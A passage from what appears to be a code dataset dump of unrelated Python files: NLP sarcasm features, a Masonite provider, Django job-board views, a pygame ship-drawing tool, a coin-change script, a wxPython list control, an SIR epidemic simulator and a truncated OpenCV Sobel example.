new_comment\n\n\ndef get_exclaimation_count(features, comment):\n\tfeatures['exclaimation'] = comment.count('!')\n\ndef get_capital_count(features, comment):\n\tcount = 0\n\tfor word in comment:\n\t\tif word.isupper():\n\t\t\tcount += 1\n\tfeatures['capital'] = count\n\ndef get_intensifier_count(features, comment):\n\t# count words that appear in the intensifier list\n\tcount = 0\n\tfor word in comment.lower().split():\n\t\tif word in intensifiers:\n\t\t\tcount += 1\n\tfeatures['intensifiers'] = count\n\ndef get_injection_count(features, comment):\n\t# count words that appear in the interjection list\n\tcount = 0\n\tfor word in comment.lower().split():\n\t\tif word in interjections:\n\t\t\tcount += 1\n\tfeatures['interjections'] = count\n\ndef get_emoji_count(features, comment):\n\tcount = 0\n\tfor word in comment.lower().split():\n\t\tif word in happy or word in sad or word in cute or word in surprised or word in love or word in indifferent:\n\t\t\tcount += 1\n\tfeatures['emoticons'] = count\n\ndef get_grams(features, comment):\n\ttokens = nltk.word_tokenize(comment)\n\tunigrams = [lemmatizer.lemmatize(token) for token in tokens]\n\tbigrams = nltk.bigrams(unigrams)\n\tbigrams = [bigram[0] + \" \" + bigram[1] for bigram in bigrams]\n\tgrams = unigrams + bigrams\n\tfor gram in grams:\n\t\tfeatures['contains(%s)' % gram] = True\n\ndef get_pos(features, comment):\n\tpos_dic = {'NN': 0, 'JJ': 0, 'VB': 0, 'RB': 0}\n\ttokens = nltk.word_tokenize(comment)\n\ttokens = [token.lower() for token in tokens]\n\tpos = nltk.pos_tag(tokens)\n\n\tfor x in xrange(len(pos)):\n\t\ttag = pos[x][1]\n\t\tif tag[0:2] == 'NN':\n\t\t\tpos_dic['NN'] += 1\n\t\telif tag[0:2] == 'JJ':\n\t\t\tpos_dic['JJ'] += 1\n\t\telif tag[0:2] == 'VB':\n\t\t\tpos_dic['VB'] += 1\n\t\telif tag[0:2] == 'RB':\n\t\t\tpos_dic['RB'] += 1\n\n\tfor key, value in pos_dic.items():\n\t\tfeatures['POS ' + key] = value\n\n\ndef get_topic(features, comment, model):\n    topics = model.get_topics(comment)\n    for j in xrange(len(topics)):\n        features['Topic'] = topics[j][1]\n\n\ndef get_subjectivity_score(feat, text):\n    '''\n    0 = very objective\n    1 = very subjective\n    '''\n    try:\n        blob = TextBlob(text.strip())\n        feat['subjectivity'] = blob.sentiment.subjectivity\n    except:\n        feat['subjectivity'] = 0.0\n\ndef get_polarity_score(feat, text):\n    '''\n    -1 = very negative\n    1 = very positive\n    '''\n    try:\n        blob = TextBlob(text.strip())\n        feat['polarity'] = blob.sentiment.polarity\n    except:\n        feat['polarity'] = 0.0\n\ndef get_average_contrast(feat, text):\n    '''\n    0 = no contrast\n    1 = high contrast\n    '''\n    negCount = 0\n    posCount = 0\n    negTotal = 0.0\n    posTotal = 0.0\n    polarityTemp = 0.0\n    polarityDif = 0.0\n    try:\n        blob = TextBlob(text.strip())\n        for sentence in blob.sentences:\n            polarityTemp = sentence.sentiment.polarity\n            if polarityTemp < 0:\n                negTotal += polarityTemp\n                negCount += 1\n            elif polarityTemp > 0:\n                posTotal += polarityTemp\n                posCount += 1\n        if negCount > 0:\n            if posCount > 0:\n                polarityDif = ((posTotal / posCount) - (negTotal / negCount)) / 2\n        feat['average_contrast'] = polarityDif\n    except:\n        feat['average_contrast'] = 0.0\n\ndef get_extreme_contrast(feat, text):\n    '''\n    0 = no contrast\n    1 = high contrast\n    '''\n    minPolarity = 0.0\n    maxPolarity = 0.0\n    polarityTemp = 0.0\n    try:\n        blob = TextBlob(text.strip())\n        for sentence in blob.sentences:\n            polarityTemp = sentence.sentiment.polarity\n            if polarityTemp > maxPolarity:\n                maxPolarity = polarityTemp\n            elif polarityTemp < minPolarity:\n                minPolarity = polarityTemp\n        feat['extreme_contrast'] = (maxPolarity - minPolarity)/2\n    except:\n        feat['extreme_contrast'] = 0.0\n\ndef get_half_contrast(feat, text):\n    '''\n    0 = no difference in polarity\n    1 
= high difference in polarity\n    '''\n    first_half_polarity = 0.0\n    second_half_polarity = 0.0\n    tokens = nltk.word_tokenize(text, language = 'english', preserve_line = False)\n    if len(tokens) == 1:\n        feat['half_contrast'] = 0.0\n    else:\n        first_half = tokens[0: int(len(tokens)/2)]\n        second_half = tokens[int(len(tokens)/2):]\n\n        try:\n            blob = TextBlob(\"\".join([\" \"+i if i not in string.punctuation else i for i in first_half]).strip())\n            first_half_polarity = blob.sentiment.polarity\n        except:\n            first_half_polarity = 0.0\n\n        try:\n            blob = TextBlob(\"\".join([\" \"+i if i not in string.punctuation else i for i in second_half]).strip())\n            second_half_polarity = blob.sentiment.polarity\n        except:\n            second_half_polarity = 0.0\n\n        feat['half_contrast'] = np.abs(first_half_polarity - second_half_polarity) / 2\n\ndef get_third_contrast(feat, text):\n    '''\n    0 = no difference in polarity\n    1 = high difference in polarity\n    '''\n    first_half_polarity = 0.0\n    second_half_polarity = 0.0\n    third_half_polarity = 0.0\n    tokens = nltk.word_tokenize(text, language = 'english', preserve_line = False)\n    if len(tokens) < 2:\n        feat['third_contrast_12'] = 0.0\n        feat['third_contrast_13'] = 0.0\n        feat['third_contrast_23'] = 0.0\n    elif len(tokens) == 2:\n        try:\n            blob = TextBlob(tokens[0])\n            first_half_polarity = blob.sentiment.polarity\n        except:\n            first_half_polarity = 0.0\n        try:\n            blob = TextBlob(tokens[1])\n            second_half_polarity = blob.sentiment.polarity\n        except:\n            second_half_polarity = 0.0\n        feat['third_contrast_13'] = 0.0\n        feat['third_contrast_23'] = 0.0\n        feat['third_contrast_12'] = np.abs(first_half_polarity - second_half_polarity) / 2\n    else:\n        first_half = tokens[0: int(len(tokens)/3)]\n        second_half = tokens[int(len(tokens)/3): 2*int(len(tokens)/3)]\n        third_half = tokens[2*int(len(tokens)/3):]\n        # join the token lists back into strings before scoring; TextBlob expects text, not a list\n        try:\n            blob = TextBlob(\" \".join(first_half))\n            first_half_polarity = blob.sentiment.polarity\n        except:\n            first_half_polarity = 0.0\n        try:\n            blob = TextBlob(\" \".join(second_half))\n            second_half_polarity = blob.sentiment.polarity\n        except:\n            second_half_polarity = 0.0\n        try:\n            blob = TextBlob(\" \".join(third_half))\n            third_half_polarity = blob.sentiment.polarity\n        except:\n            third_half_polarity = 0.0\n        feat['third_contrast_12'] = np.abs(first_half_polarity - second_half_polarity) / 2\n        feat['third_contrast_13'] = np.abs(first_half_polarity - third_half_polarity) / 2\n        feat['third_contrast_23'] = np.abs(second_half_polarity - third_half_polarity) / 2\n\n\ndef get_features(comment, model):\n\tfeatures = {}\n\tget_exclaimation_count(features, comment)\n\tget_capital_count(features, comment)\n\tget_intensifier_count(features, comment)\n\tget_injection_count(features, comment)\n\tget_emoji_count(features, comment)\n\tcomment = replace(comment)\n\tget_grams(features, comment)\n\tget_pos(features, comment)\n\tget_topic(features, comment, model)\n\tget_subjectivity_score(features, comment)\n\tget_polarity_score(features, comment)\n\tget_average_contrast(features, comment)\n\tget_extreme_contrast(features, comment)\n\tget_half_contrast(features, comment)\n\tget_third_contrast(features, comment)\n\treturn features\n","sub_path":"SVM/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":9637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"218530202","text":"\"\"\" A StartResponseProvider Service Provider \"\"\"\n\nfrom masonite.exceptions import ResponseError\nfrom masonite.provider import ServiceProvider\n\n\nclass StartResponseProvider(ServiceProvider):\n\n    def 
register(self):\n pass\n\n def boot(self, Request, Response, Headers):\n if not Request.redirect_url:\n # Convert the data that is retrieved above to bytes\n # so the wsgi server can handle it.\n try:\n data = bytes(Response, 'utf-8')\n except TypeError:\n raise ResponseError(\n 'An acceptable response type was not returned')\n\n self.app.bind('StatusCode', Request.get_status_code())\n Headers += [\n (\"Content-Length\", str(len(data)))\n ] + Request.get_cookies() + Request.get_headers()\n else:\n self.app.bind('StatusCode', \"302 OK\")\n self.app.bind('Headers', [\n ('Location', Request.redirect_url)\n ] + Request.get_cookies())\n\n Request.reset_redirections()\n\n self.app.bind('Response', 'redirecting ...')\n\n Request.url_params = {}\n Request.reset_headers()\n Request.cookies = []\n if self.app.has('Session') and self.app.make('StatusCode') == '200 OK':\n self.app.make('Session').reset(flash_only=True)\n","sub_path":"masonite/providers/StartResponseProvider.py","file_name":"StartResponseProvider.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54653361","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom ..loginApp.models import User\nfrom .models import Job\nfrom django.contrib import messages\n\n# CRUD\n\ndef addToDB(title, description, location, id_user):\n\n job = Job.objects.create(\n title = title,\n description = description,\n location = location,\n job_posted_by = User.objects.get(id = id_user),\n )\n\n return job\n\n\ndef updateOnDB(title, description, location, id_job):\n\n print(description)\n print(location)\n\n job = Job.objects.get(id = id_job)\n job.title = title\n job.description = description\n job.location = location\n job.save()\n\n return job\n\n\ndef removeFromDB(id_job):\n \n job = Job.objects.get(id = id_job)\n job.delete()\n\n return True\n\n\ndef addToMyListDB(id_job,id_user):\n\n job = Job.objects.get(id = id_job)\n user = User.objects.get(id = id_user)\n\n job.job_taken_by = user\n job.save()\n\n return job\n\n\n\n# ROUTES\ndef gotoDashboard(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'user' : User.objects.get(id = request.session['id']),\n 'jobs' : Job.objects.filter(job_taken_by__isnull=True),\n #myjobs = user.taken_jobs.all\n }\n\n return render(request,'index.html',context)\n\n\ndef gotoAddJob(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'tipo' : 'add',\n }\n\n return render(request,'addOrEditJob.html',context) \n\ndef createJob(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n if request.method == \"POST\":\n errors = Job.objects.job_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value) \n\n job = Job(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n )\n\n context = {\n 'job' : job,\n 'tipo' : 'add',\n }\n \n return render(request,'addOrEditJob.html',context) #go back to \"addJob/create\"\n\n else:\n\n job = addToDB(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id_user = request.session['id'],\n )\n\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully added to list of available 
jobs!\")\n \n return redirect('dashboard')\n\n\ndef gotoEditJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n\n user = User.objects.get(id = request.session['id'])\n \n if user.id != job.job_posted_by.id:\n return redirect('dashboard')\n\n context = {\n 'job' : job,\n 'tipo' : 'edit',\n }\n \n return render(request,'addOrEditJob.html',context) \n\n\ndef updateJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n\n if request.session['id'] != job.job_posted_by.id:\n return redirect('dashboard') \n\n if request.method == \"POST\":\n errors = Job.objects.job_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value) \n\n job = Job(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id = id_job,\n )\n\n context = {\n 'job' : job,\n 'tipo' : 'edit',\n }\n \n return render(request,'addOrEditJob.html',context) #go back to \"addJob/create\"\n\n else:\n\n job = updateOnDB(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id_job = id_job,\n )\n\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully updated!\")\n\n return redirect('dashboard') \n \n\n\ndef viewJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'job' : Job.objects.get(id = id_job)\n }\n return render(request,'viewJob.html',context) \n\n\ndef addToMyJobs(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n \n if len(Job.objects.filter(id = id_job,job_taken_by__isnull = True)) > 0:\n id_user = request.session['id']\n job = addToMyListDB(id_job,id_user)\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully added to My List of Jobs!\")\n\n return redirect('dashboard')\n\n\ndef deleteJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n job_title = job.title \n\n if job.job_taken_by and job.job_taken_by.id == request.session['id']:\n removeFromDB(id_job)\n messages.success(request, f\"[Id.{id_job}] {job_title} done and removed from My Jobs!\")\n elif job.job_posted_by.id == request.session['id']:\n removeFromDB(id_job)\n messages.warning(request, f\"[Id.{id_job}] {job_title} cancelled!\")\n\n return redirect('dashboard')","sub_path":"apps/myApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598984124","text":"import pygame\n\nimport sys\nimport xml.etree.ElementTree as ET\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nGRID_STEP = 25\n\n# pygame initialization\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"LoneStar ShipDraw\")\ndone = False\n\ndrawgrid = True\n\nshiphull = []\nscaledhullpoints = []\ndrawingHull = True\n\n# handle mouse clicks\ndef clicked(event):\n global drawingHull\n global shiphull\n global scaledhullpoints\n \n if drawingHull:\n hullpos = tuple(round(i / GRID_STEP) for i in event.pos)\n \n if len(shiphull) == 0:\n shiphull.append(hullpos)\n else:\n shiphull = shiphull 
+ hullPath(hullpos)[1:]\n \n if len(shiphull) > 1 and shiphull[-1] == shiphull[0]:\n drawingHull = False\n scaledhullpoints = [(p[0] * GRID_STEP, p[1] * GRID_STEP) for p in shiphull]\n \n# draw the ship's outline while hull-drawing is occuring\ndef drawOutline(hull, preview):\n for i in range(1, len(hull)):\n hullPos = (hull[i][0] * GRID_STEP, hull[i][1] * GRID_STEP)\n prevhullPos = (hull[i - 1][0] * GRID_STEP, hull[i - 1][1] * GRID_STEP)\n \n if preview:\n pygame.draw.line(screen, (150,150,150), hullPos, prevhullPos, 3)\n else:\n pygame.draw.line(screen, (0,0,0), hullPos, prevhullPos, 3)\n \n# get point neighbors\ndef pointNeighbors(pos):\n neighbors = [\n (pos[0], pos[1] - 1),\n (pos[0] - 1, pos[1]),\n (pos[0] + 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0] - 1, pos[1] - 1),\n (pos[0] + 1, pos[1] - 1),\n (pos[0] - 1, pos[1] + 1),\n (pos[0] + 1, pos[1] + 1)\n ]\n \n return neighbors\n \n# return true if the point lies in bounds, false otherwise\ndef validPoint(pos):\n if (pos[0] < 0 or pos[0] > SCREEN_WIDTH / GRID_STEP):\n return False\n \n if (pos[1] < 0 or pos[1] > SCREEN_HEIGHT / GRID_STEP):\n return False\n \n if inList([shiphull[i] for i in range(2, len(shiphull))], pos):\n return False\n \n return True\n \n \n# draw hull cursor\ndef hullCursor(pos):\n posX = pos[0] * GRID_STEP\n posY = pos[1] * GRID_STEP\n \n pygame.draw.circle(screen, (255,0,0), (posX, posY), 3)\n pygame.draw.circle(screen, (255,255,255), (posX, posY), 5, 1)\n \n# check whether a point is in a point list\ndef inList(list, point):\n for p in list:\n if p == point:\n return True\n \n return False\n \n# find the shortest grid path from the most recent point in the path to a new point\n# point is the goal point\ndef hullPath(point):\n queue = [[shiphull[-1]]]\n visited = [shiphull[-1]]\n \n while len(queue):\n curpath = queue.pop(0)\n \n if curpath[-1] == point:\n return curpath\n \n for p in pointNeighbors(curpath[-1]):\n if validPoint(p) and not inList(visited, p):\n queue.append(curpath + [p])\n visited.append(p)\n \n return []\n \n# determine whether or not the user can save the ship they've drawn\n# the ship must have a finished hull\ndef canSaveShip():\n if drawingHull:\n print(\"You must finish drawing a hull before saving.\")\n return False\n \n return True\n \n# export the drawn ship to an XML file for import into LoneStar\ndef saveShip():\n if not canSaveShip():\n return\n \n ship = ET.Element('ship')\n \n hull = ET.SubElement(ship, 'hull')\n \n # add hull data to ship xml\n for wallpoint in shiphull:\n hullwall = ET.SubElement(hull, 'wall')\n hullwall.set('type', 'default')\n hullwall.set('posX', str(wallpoint[0]))\n hullwall.set('posY', str(wallpoint[1]))\n \n \n # write the ship to the file\n data = ET.tostring(ship, encoding='unicode')\n file = open(\"Ships/\" + sys.argv[1] + \".ship\", \"w\")\n file.write(data)\n \n print(\"Ship '\" + sys.argv[1] + \"' saved!\")\n\n\n# main shipdraw loop\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_g:\n # toggle grid\n drawgrid = not drawgrid\n if event.key == pygame.K_s:\n # save the ship\n saveShip()\n elif event.key == pygame.K_ESCAPE:\n # quit ShipDraw\n done = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # handle mouse clicks\n clicked(event)\n \n # draw background\n screen.fill((220,220,220))\n \n unitMousePos = tuple(round(i / GRID_STEP) for i in pygame.mouse.get_pos())\n \n # draw grid cursor for both the mouse position and last placed hull 
point\n # also draw preview to next point\n if drawingHull:\n drawOutline(shiphull, False)\n\n hullCursor(unitMousePos)\n if len(shiphull) > 0:\n hullCursor(shiphull[-1])\n \n # draw path preview\n drawOutline(hullPath(unitMousePos), True)\n else:\n pygame.draw.polygon(screen, (200,200,200), scaledhullpoints)\n pygame.draw.polygon(screen, (0,0,0), scaledhullpoints, 3)\n \n # draw point grid\n if drawgrid:\n for x in range(0, SCREEN_WIDTH + 1, GRID_STEP):\n for y in range(0, SCREEN_HEIGHT + 1, GRID_STEP):\n pygame.draw.circle(screen, (100,100,100), (x, y), 2)\n \n if drawingHull:\n hullCursor(unitMousePos)\n\n pygame.display.flip()","sub_path":"utils/shipdraw/shipdraw.py","file_name":"shipdraw.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329672520","text":"from time import time\nimport sys\n\ncoins = []\noutput = False\n# dataset format: \"50, 1, 20, 50, 2\"\nf = open(sys.argv[1], 'r').read().split(\",\")\nfor num in f:\n coins.append(int(num))\nprint(\"Available coins:\", coins)\n\n\ndef find_coin_greedy(v):\n ans = []\n # take the biggest coin available, sorting and reversing iteration\n coins_sorted = sorted(coins)\n for coin in reversed(coins_sorted):\n while v >= coin:\n v = v - coin\n ans.append(coin)\n if output:\n print(\" Returned coins:\", ans)\n\n\ndef find_coin_brutal(v):\n ans = []\n for coin in coins:\n while v >= coin:\n v = v - coin\n ans.append(coin)\n if output:\n print(\" Returned coins:\", ans)\n\n\nif len(sys.argv) == 3 and sys.argv[2] == \"-o\":\n output = True\nn = int(input(\"Money to exchange (in cents): \"))\nstartTime = time()\nfind_coin_brutal(n)\nelapsedTime = time() - startTime\nprint(\" Brutal Force:\", elapsedTime, \"seconds\")\nstartTime = time()\nfind_coin_greedy(n)\nelapsedTime = time() - startTime\nprint(\" Greedy:\", elapsedTime, \"seconds\")\n","sub_path":"coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"41908507","text":"# Start the imports\r\n\r\nimport os\r\nimport wx\r\n\r\nimport extern.ultimatelistctrl as ULC\r\nimport extern.listctrl as listmix\r\n\r\nfrom utilities import shortNow\r\nfrom constants import _iconMapper, _messageImageList, _messageColumnNames\r\n\r\n\r\nclass MessageWindow(ULC.UltimateListCtrl, listmix.ListCtrlAutoWidthMixin):\r\n\r\n def __init__(self, parent, columnNames=_messageColumnNames, images=_messageImageList):\r\n \"\"\"\r\n Default class constructor.\r\n\r\n :param `parent`: the parent widget\r\n :param `columnNames`: the list control column names\r\n \"\"\"\r\n\r\n ULC.UltimateListCtrl.__init__(self, parent, -1, style=wx.SUNKEN_BORDER, agwStyle=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES|wx.LC_VIRTUAL)\r\n\r\n # Initialize the auto width mixin. 
We always need it \r\n listmix.ListCtrlAutoWidthMixin.__init__(self)\r\n self.MainFrame = wx.GetTopLevelParent(self)\r\n\r\n self.popupId1, self.popupId2 = wx.NewId(), wx.NewId()\r\n self.messages = []\r\n self.textColour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_LISTBOXTEXT)\r\n\r\n self.EnableSelectionVista()\r\n \r\n # Do the hard work\r\n self.BuildImageList(images)\r\n self.InsertColumns(columnNames)\r\n self.BindEvents()\r\n\r\n self.SetItemCount(200)\r\n\r\n\r\n # ========================== #\r\n # Methods called in __init__ #\r\n # ========================== #\r\n \r\n def InsertColumns(self, columnNames):\r\n \"\"\" Inserts the columns in the list control. \"\"\"\r\n\r\n # The first column is always empty text, as I use it to display\r\n # an informative/fancy icon\r\n self.InsertColumn(0, \"\")\r\n\r\n # Loop over all the column names \r\n for indx, column in enumerate(columnNames):\r\n self.InsertColumn(indx+1, column)\r\n self.SetColumnWidth(indx+1, wx.LIST_AUTOSIZE_USEHEADER)\r\n\r\n # The first column only displays an icon, 24 is perfect on Windows\r\n self.SetColumnWidth(0, 24)\r\n\r\n\r\n def BuildImageList(self, images):\r\n \"\"\" Build the image list for the list control. \"\"\"\r\n \r\n # Ok, here it gets tricky as I am trying to re-use the same base class\r\n # for 6 or more different list control\r\n imgList = wx.ImageList(16, 16)\r\n\r\n # Loop over all the images in the list\r\n for png in images:\r\n imgList.Add(self.MainFrame.CreateBitmap(png))\r\n\r\n # Assign the image list, I don't want to store it \r\n self.AssignImageList(imgList, wx.IMAGE_LIST_SMALL) \r\n \r\n \r\n def BindEvents(self):\r\n \"\"\" Bind the events for the list control. \"\"\"\r\n\r\n self.Bind(wx.EVT_LIST_COL_RIGHT_CLICK, self.OnRightClick)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick)\r\n self.Bind(wx.EVT_LIST_COL_BEGIN_DRAG, self.OnColumnDrag)\r\n\r\n self.Bind(wx.EVT_MENU, self.OnExportMessages, id=self.popupId1)\r\n self.Bind(wx.EVT_MENU, self.OnHistoryClear, id=self.popupId2)\r\n\r\n\r\n def OnColumnDrag(self, event):\r\n \"\"\" Handles the wx.EVT_LIST_COL_BEGIN_DRAG event for the list control. \"\"\"\r\n\r\n if event.GetColumn() == 0:\r\n # Veto the event for the first column, it holds the icon\r\n event.Veto()\r\n return\r\n\r\n event.Skip()\r\n\r\n\r\n def OnRightClick(self, event):\r\n \"\"\"\r\n Handles the wx.EVT_LIST_COL_RIGHT_CLICK/wx.EVT_LIST_ITEM_RIGHT_CLICK\r\n event for the list control.\r\n \"\"\"\r\n\r\n menu = wx.Menu()\r\n\r\n item = wx.MenuItem(menu, self.popupId1, \"Export messages\")\r\n bmp = self.MainFrame.CreateBitmap(\"export\")\r\n item.SetBitmap(bmp)\r\n menu.AppendItem(item) \r\n\r\n item = wx.MenuItem(menu, self.popupId2, \"Clear history\")\r\n bmp = self.MainFrame.CreateBitmap(\"history_clear\")\r\n item.SetBitmap(bmp)\r\n menu.AppendItem(item) \r\n\r\n # Popup the menu. If an item is selected then its handler\r\n # will be called before PopupMenu returns.\r\n self.PopupMenu(menu)\r\n\r\n\r\n def OnHistoryClear(self, event):\r\n \"\"\" Handles the wx.EVT_MENU event for the list control. \"\"\"\r\n\r\n # Freeze everything... 
It helps with flicker\r\n self.Freeze()\r\n # Delete all the items, the user cleared all\r\n self.DeleteAllItems()\r\n\r\n self.messages = []\r\n self.SetItemCount(200)\r\n \r\n # Time to warm up\r\n self.Thaw()\r\n \r\n\r\n def OnExportMessages(self, event):\r\n\r\n pass\r\n \r\n\r\n # ================= #\r\n # Auxiliary methods #\r\n # ================= #\r\n\r\n \r\n def SendMessage(self, kind, message):\r\n \"\"\" Prints an user-friendly message on the list control. \"\"\"\r\n\r\n messages = [msg[2] for msg in self.messages]\r\n \r\n lenMess = len(self.messages)\r\n itemCount = self.GetItemCount()\r\n \r\n if lenMess == itemCount-1:\r\n self.SetItemCount(itemCount+200)\r\n\r\n # Get the current time slightly dirrently formatted\r\n currentTime = shortNow()\r\n\r\n self.messages.append((kind, currentTime, message)) \r\n \r\n # Ensure the last item is visible\r\n if lenMess > 3:\r\n self.EnsureVisible(lenMess)\r\n \r\n self.Refresh()\r\n self.Update()\r\n\r\n\r\n def OnGetItemText(self, item, col):\r\n\r\n lenMess = len(self.messages)\r\n\r\n if lenMess == 0 or col == 0 or item >= lenMess:\r\n return \"\"\r\n\r\n return self.messages[item][col]\r\n \r\n\r\n def OnGetItemImage(self, item):\r\n\r\n lenMess = len(self.messages)\r\n\r\n if lenMess == 0 or item >= lenMess:\r\n return []\r\n\r\n kind = self.messages[item][0]\r\n return _iconMapper[kind]\r\n\r\n\r\n def OnGetItemTextColour(self, item, col):\r\n\r\n return self.textColour\r\n \r\n\r\n def OnGetItemToolTip(self, item, col):\r\n\r\n return \"\"\r\n\r\n","sub_path":"messagewindow.py","file_name":"messagewindow.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"1858587","text":"import contextlib\nwith contextlib.redirect_stdout(None): # Remove pygame prints during import\n import pygame\n from pygame.locals import *\nimport colorama\nfrom colorama import Cursor\nimport argparse as arg\n\nfrom graphics import Graphics\nfrom world import World, Disease\nfrom statistics import Statistics\n\nclass SIRSimulator:\n def __init__(self, pop_size = 100, world_size = (500, 500)):\n self.graphics = Graphics()\n self.size = self.width, self.height = world_size\n self.running = False\n self.run_simulation = False\n self.clock = pygame.time.Clock()\n self.cursor_steps = 0\n self.stats_period = 500\n self.STAT_EVENT = pygame.USEREVENT+1\n self.compute_stats = False\n self.pop_size = pop_size\n self.world_size = world_size\n self.weight_actors = [1, 1, 1, 1, 1]\n\n self.world = World(nb_actors = pop_size,\n weight_actors = self.weight_actors,\n world_size = self.world_size,\n time = 0)\n self.disease = Disease()\n self.statistics = Statistics()\n\n self.simulation_time_step_ms = 50\n self.simulation_time = 0\n\n def on_init(self):\n colorama.init()\n pygame.init()\n self.graphics.initialize(self.size)\n return True\n\n def initialize_simulation(self):\n self.simulation_time = 0\n self.world= World(nb_actors = self.pop_size,\n weight_actors = self.weight_actors,\n world_size = self.size,\n time = 0)\n self.disease.initialize(self.world, 0)\n if self.compute_stats:\n self.statistics.initialize()\n pygame.time.set_timer(self.STAT_EVENT, self.stats_period)\n\n def on_loop(self):\n t0 = pygame.time.get_ticks()\n\n self.simulation_time += self.simulation_time_step_ms\n self.world.step(self.simulation_time)\n t1 = pygame.time.get_ticks()\n #print(\"Time taken by world step \" + str(t1 - t0) + \" \")\n self.cursor_steps += 1\n\n 
self.disease.step(self.simulation_time)\n t2 = pygame.time.get_ticks()\n #print(\"Time taken by disease step \" + str(t2 - t1) + \" \")\n self.cursor_steps += 1\n\n def on_render(self):\n self.graphics.render_world(self.world)\n\n def on_cleanup(self):\n pygame.quit()\n colorama.deinit()\n\n def on_event(self, event):\n time = pygame.time.get_ticks()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_p:\n self.initialize_simulation()\n self.run_simulation = True\n\n if event.key == pygame.K_s:\n self.run_simulation = not self.run_simulation\n\n if event.key == pygame.K_ESCAPE:\n self.running = False\n\n if event.type == self.STAT_EVENT:\n self.statistics.step(time, self.world)\n \n\n def on_execute(self):\n self.running = self.on_init()\n\n while(self.running):\n self.cursor_steps = 0\n for event in pygame.event.get():\n self.on_event(event) \n if (self.run_simulation):\n self.on_loop()\n t0 = pygame.time.get_ticks()\n self.on_render()\n t1 = pygame.time.get_ticks()\n #print(\"Time taken by render step \" + str(t1 - t0) + \" \")\n self.cursor_steps += 1\n #print(\"fps : \" + str(self.clock.get_fps()) + \" \")\n self.cursor_steps += 1\n #print(Cursor.UP(self.cursor_steps + 1))\n self.clock.tick(60)\n self.on_cleanup()\n\ndef format_args(args):\n if len(args.world_size) == 0:\n args.world_size = [500, 500]\n elif len(args.world_size) == 1:\n args.world_size = [args.world_size[0], args.world_size[0]]\n else:\n args.world_size = [args.world_size[0], args.world_size[1]]\n \nif __name__ == \"__main__\":\n parser = arg.ArgumentParser(description = '',\n epilog = '',\n add_help = True)\n parser.add_argument('--pop_size', dest = 'pop_size', nargs = '?',\n action = 'store', type = int, required = False,\n default = 100,\n help = ('The total number of individuals in the '\n + 'populations'))\n parser.add_argument('--world_size', dest = 'world_size', nargs = '*',\n action = 'store', type = int, required = False,\n default = [500, 500],\n help = ('The world size'))\n\n args = parser.parse_args()\n format_args(args)\n SIRSim = SIRSimulator(pop_size = args.pop_size,\n world_size = tuple(args.world_size))\n SIRSim.on_execute()\n","sub_path":"SIRSimulator.py","file_name":"SIRSimulator.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"462873310","text":"# 0206.py\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nimg1 = cv2.imread('./lena.jpg')\r\nimg2 = cv2.imread('./lena.jpg')\r\nimg3 = cv2.imread('./LenaNoise.PNG')\r\nimg4 = cv2.imread('./LenaNoise.PNG')\r\n\r\n# color conversion: BGR -> RGB\r\n\r\n# Sobel operation\r\nsobelX = np.array([[-1, 0, 1],\r\n [-2, 0, 2],\r\n [-1, 0, 1]])\r\ngx = cv2.filter2D(img1, cv2.CV_32F, sobelX)\r\nsobelY = np.array([[-1, -2, -1],\r\n [0, 0, 0],\r\n [1, 2, 1]])\r\ngy = 